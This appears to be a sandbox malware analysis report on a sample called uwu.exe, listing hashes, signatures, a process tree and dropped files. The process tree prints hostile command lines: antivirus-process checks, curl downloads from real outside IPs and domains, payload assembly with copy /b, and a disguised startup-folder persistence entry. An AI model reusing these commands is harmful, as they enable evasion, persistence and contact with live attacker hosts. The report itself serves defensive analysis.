Analysis

  • max time kernel
    146s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    12/11/2024, 16:39

General

  • Target

    uwu.exe

  • Size

    1.0MB

  • MD5

    fc877cda1618318751789044fb01a6bd

  • SHA1

    15f90c8f5c543964a33d62d6e68f62a6d2712262

  • SHA256

    ec059d014e9208dceded5ce614ea4f95e26c1ed45ad81ce5de348e5df7647197

  • SHA512

    b96c3148e98b089ce25b1a2987df24f87bd0e7cd312ee9dc270ce3d6dacc48276213f313c162dc721440410c2ca1a265fd54eea546095a2cafbe2a34cac912d4

  • SSDEEP

    24576:ruPaNmFtZU7DPNqRLhVVOgHD/raiDhFDsoUCcjL:NQzUvPNakGbD/soUdjL

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 40 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1204
      • C:\Users\Admin\AppData\Local\Temp\uwu.exe
        "C:\Users\Admin\AppData\Local\Temp\uwu.exe"
        2⤵
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2624
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c copy Tuition Tuition.cmd & Tuition.cmd
          3⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2804
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist
            4⤵
            • Enumerates processes with tasklist
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:992
          • C:\Windows\SysWOW64\findstr.exe
            findstr /I "wrsa opssvc"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:712
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist
            4⤵
            • Enumerates processes with tasklist
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:1816
          • C:\Windows\SysWOW64\findstr.exe
            findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1084
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c md 226443
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2164
          • C:\Windows\SysWOW64\findstr.exe
            findstr /V "AthleticsTabletsUserImaging" Slovenia
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2156
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c copy /b ..\Tackle + ..\Heather + ..\Column + ..\Environment + ..\Events + ..\Merit + ..\Law + ..\Explanation d
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1924
          • C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif
            Crossword.pif d
            4⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:840
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\Admin\AppData\Local\temp\115 2>&1
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:740
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:2148
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\temp\115 > C:\Users\Admin\AppData\Local\temp\622
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1860
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\nciks" "178.215.224.252/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2872
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ctids" "178.215.224.74/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2772
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\spyii" "178.215.224.161/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:3032
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\agpeu" "178.215.224.251/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2676
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\gjlcd" "178.215.224.65/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2856
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bqtvf" "bnrwinonalolita.com/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2668
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\iioke" "dionisarnoldcefee.com/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2716
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ssyce" "178.215.224.252/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2564
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\rbetm" "178.215.224.74/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2952
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\mvosy" "178.215.224.161/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2224
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\acrxz" "178.215.224.251/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1156
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bwimx" "178.215.224.65/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2508
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\zqalu" "bnrwinonalolita.com/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1456
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\salig" "dionisarnoldcefee.com/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:112
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\pyxgn" "178.215.224.252/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2908
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\gbhnc" "178.215.224.74/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2192
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\skigw" "178.215.224.161/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2628
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\mmnzc" "178.215.224.251/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2080
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\cnjui" "178.215.224.65/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2440
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wfmgw" "bnrwinonalolita.com/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:628
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lzvtc" "dionisarnoldcefee.com/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:316
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wmknk" "178.215.224.252/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:576
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\sjngf" "178.215.224.74/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1628
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bfarj" "178.215.224.161/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1084
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\jlmee" "178.215.224.251/v10/ukyh.php?jspo=6"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2160
          • C:\Windows\SysWOW64\choice.exe
            choice /d y /t 5
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1768
      • C:\Windows\SysWOW64\cmd.exe
        cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url" & echo URL="C:\Users\Admin\AppData\Local\SafeNet Solutions Inc\CyberGuard.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url" & exit
        2⤵
        • Drops startup file
        • System Location Discovery: System Language Discovery
        PID:2888

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\226443\d

            Filesize

            546KB

            MD5

            7e6971c69a6ca7279da0e89b4b388189

            SHA1

            894fdd50dead4f46ac677ad06d1455943167ae1f

            SHA256

            1ae9c8851afa317293db0435ea27ad3fa8fda82a08209ee536ec947130e5c98c

            SHA512

            06296a0878df852fdd54fb31366d09c5c1984e1f6eaea22f1895d40a78d0ff07cf7a90bf1725becc630dbb33906d0764d6f314653c8f965ffdd91310c9699c0b

          • C:\Users\Admin\AppData\Local\Temp\Column

            Filesize

            75KB

            MD5

            d05e382bb4f1e9bb4bce6108e318ea6b

            SHA1

            ae0344388bc8d4e10a93c305c1f80bc60ab7bd7a

            SHA256

            ccd218caebb98be70e2caf40b17d54510571e48efa475cdce3c2f71581232a51

            SHA512

            742980e178aa801829c623ab9ff4d494d8555e2ef26542abdaf46b47fcf521ccf8dd7bf248ff98f1104a8fb18606c84bb4ca198df3ee28b96525bccae7a06d80

          • C:\Users\Admin\AppData\Local\Temp\Environment

            Filesize

            64KB

            MD5

            b6024d20dba6454f8e2df9086438fce7

            SHA1

            3edb339cc5960a05ab3d1ab615d4152b092ee832

            SHA256

            a87a9f1aee8317c1f3fd9c69ee65a569944618092cc1f6fbeb467ab2aa73cecf

            SHA512

            651e002fa45b48d51803fdd13ff379bf29937438df3a4001c7f935643ca1de4b5a2e4a4a376adf1b3c35b00ac1ed0856916b9d048a88a07a4d8bb989c4a62c56

          • C:\Users\Admin\AppData\Local\Temp\Events

            Filesize

            95KB

            MD5

            67498253ff01bc79ab26bdaa2183b367

            SHA1

            5c6efd758ab0b450c8a9ecaeb108e9272535a3b3

            SHA256

            60c91ae2bed2f72dda2ff6cb4deb1367a437df370be43bea1b7fdb58fd43fae8

            SHA512

            75fd5cf671a177d0c0ff18e2d088b1b6de0ef839cfd5ea410c4cfba65f26e2253983fb0ad7904cd4ba3f012b035a4682cc95ffbc35d96ad84c09ed2fc3cc19e8

          • C:\Users\Admin\AppData\Local\Temp\Explanation

            Filesize

            14KB

            MD5

            773bc1cb8deb9ff09bc892af84ae5681

            SHA1

            09f815af8eca0c373302204f58b47f591a300b7c

            SHA256

            f97765bb2d46f5755af315c71afeb50f52f282caee0a19b9f2644946a9308d42

            SHA512

            e05b77521bf5c51b60a0d7e9cdc8df2c06e3a065dc3afd42d34444484941b934e36e1ce4f80fb7a86d7c1bb8935abed9070672a02a4a3c12e22a17907b0c9223

          • C:\Users\Admin\AppData\Local\Temp\Heather

            Filesize

            52KB

            MD5

            5ebe13d4704e614c4e597bed036a2591

            SHA1

            b6a40f939e04c997482307fb14126e716efafb2b

            SHA256

            3b65ae5300550700ece120dade16b6a47ceda16b437853eda1d5c4358d990712

            SHA512

            ee436b9624eb7eed3c4ae94637a9f13e53cd8da340aad4850cd9c8b8a7d98545623579cb34829ffe04904274033ae7f90f2d18f9dc1ecf260294c76cce943c36

          • C:\Users\Admin\AppData\Local\Temp\Index

            Filesize

            902KB

            MD5

            358194c0c510ff11f8f3d68afe5ea595

            SHA1

            e801c32a9b1414741a6fb2aec201d979ec927bbf

            SHA256

            cfb087fd56dd576f4f4db3b0930adf021950b20b65fe4c1527cb9a090e00565b

            SHA512

            8805cc8cb6eeb466afe5f5bea5baf3eeda3cf6f422cc761239c31656624472637d5d3a5ecfec45f134f620c34a674e8edd8b88ff36647ea4628bfcc7988fac86

          • C:\Users\Admin\AppData\Local\Temp\Law

            Filesize

            72KB

            MD5

            a57501ae52b7c24db316a678306f8083

            SHA1

            3cf2b2942943163781db70f6759153214fcd1c37

            SHA256

            8ea7d0e706039bd23733e77b84199102bcd4df8ece1e0c63daf55ed29749683c

            SHA512

            306de902e6f18b1acceb3bbac47b619bcd0f148a04fd634d13c0a9fdf57ec56edd688ffdd56ec6c827897209c3ffeeb362b2acfe9e1f2df348d7982e4c5626fc

          • C:\Users\Admin\AppData\Local\Temp\Merit

            Filesize

            82KB

            MD5

            f8fef0dc6066b6bdae93db3c69368170

            SHA1

            e4d55d4c83b049968d5a6f4eee6ad9efe86dff79

            SHA256

            d945301adc544bc59bac06e95326eea938fc0e88a004bc36ab10e2eda222e374

            SHA512

            274311de8ddabaa6de2ad8f2266a6af3f2e306e488e272e3d6931c2edbc95437cfe0cd0f32e2818bf6daf30872d2ef1e610257f1ec85e20b7c4ba4d78d83a6c4

          • C:\Users\Admin\AppData\Local\Temp\Slovenia

            Filesize

            18KB

            MD5

            1332165a90a96d564adbea76842051de

            SHA1

            6a99c791f8a492ecccf5ada0b77be493a61b1bc9

            SHA256

            e9edb0d724fc9f115572c847bc1d0c63b9a53d577771bd62384ba145ccc8ff36

            SHA512

            d6f3da7a6d6c1c8d6219a6c1512e693dbc9e06db9906d1a0e50da90971a13efdf26b413a713b46e71583b1878271ab8795e9aecf82a59359b5114248c4ef4bc6

          • C:\Users\Admin\AppData\Local\Temp\Tackle

            Filesize

            92KB

            MD5

            a28ef671a2529783f795e0ce242b69a7

            SHA1

            3605589e946dcac4492b8a7799660ff4f1a323d1

            SHA256

            9d68a50b8498172bb2607b4652ed522d009e487cb0683c155805ef199274a745

            SHA512

            b67e45bda8d8733994f0eabeb454c5853ae5e6f06c7c49826b3995f23d2a5909ac0678f7e810dd7c78fbe3c25a46c996e1b55cc2f880aabcb343979b88448aa8

          • C:\Users\Admin\AppData\Local\Temp\Tuition

            Filesize

            26KB

            MD5

            cec47644f0f51a10cce5656a87673d71

            SHA1

            b7abebf08227a9860d7300128a9161841a4b191f

            SHA256

            34f31de17e65a33977c52d925c766af16d01e97ed9dd84f72048f1a9b5cb269e

            SHA512

            42ead80a00f47d02074b131e9b54037840ce182b963fe0b1a279d6a851fd300dd0be355503308ad489646e52f081fa46f76e76f915e01162b8b061764663c167

          • C:\Users\Admin\AppData\Local\temp\115

            Filesize

            32B

            MD5

            b65e9213dae00101a52d72b56120ff81

            SHA1

            d52caec94e56a19cca2bcc6e38dc780b1cb90027

            SHA256

            dfa7c49d13da53cc057bce84a0944d83258bf61671f92b2f7d0d9ee3e3896740

            SHA512

            09daf8969898babaaaa9ae8959b5345e204a27ff7b84f0bfb696b1e25130a9f659519a040eeaeae74c8c091586e76a6150743b30f419c0b1952c24c6c227584e

          • \Users\Admin\AppData\Local\Temp\226443\Crossword.pif

            Filesize

            921KB

            MD5

            78ba0653a340bac5ff152b21a83626cc

            SHA1

            b12da9cb5d024555405040e65ad89d16ae749502

            SHA256

            05d8cf394190f3a707abfb25fb44d7da9d5f533d7d2063b23c00cc11253c8be7

            SHA512

            efb75e4c1e0057ffb47613fd5aae8ce3912b1558a4b74dbf5284c942eac78ecd9aca98f7c1e0e96ec38e8177e58ffdf54f2eb0385e73eef39e8a2ce611237317

          • memory/840-622-0x0000000003540000-0x000000000359A000-memory.dmp

            Filesize

            360KB

          • memory/840-624-0x0000000003540000-0x000000000359A000-memory.dmp

            Filesize

            360KB

          • memory/840-623-0x0000000003540000-0x000000000359A000-memory.dmp

            Filesize

            360KB

          • memory/840-626-0x0000000003540000-0x000000000359A000-memory.dmp

            Filesize

            360KB

          • memory/840-625-0x0000000003540000-0x000000000359A000-memory.dmp

            Filesize

            360KB

          • memory/840-627-0x0000000003540000-0x000000000359A000-memory.dmp

            Filesize

            360KB